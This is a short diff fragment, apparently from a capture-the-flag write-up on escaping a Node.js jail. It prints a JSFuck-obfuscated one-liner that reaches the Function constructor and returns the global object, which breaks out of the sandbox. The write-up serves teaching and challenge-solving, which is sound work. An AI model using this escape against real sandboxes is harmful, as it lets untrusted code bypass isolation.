๐ NodeJs - Never Trust Node One

 }

-Weโll do the exact same thing inside our jail but using JSFuck
+Weโll do the exact same thing inside our jail but using JSFuck format.

 >>> ''[(!1+'')[1]+(!0+'')[0]][({}+'')[5]+({}+'')[1]+(1/0+'')[4]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+({}+'')[5]+(!0+'')[0]+({}+'')[1]+(!0+'')[1]]((!0+'')[1]+(!0+'')[3]+(!0+'')[0]+(!0+'')[2]+(!0+'')[1]+(1/0+'')[4]+' '+(''[({}+'')[5]+({}+'')[1]+(1/0+'')[4]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+({}+'')[5]+(!0+'')[0]+({}+'')[1]+(!0+'')[1]]+'')[14]+(!1+'')[2]+({}+'')[1]+({}+'')[2]+(!1+'')[1]+(!1+'')[2])()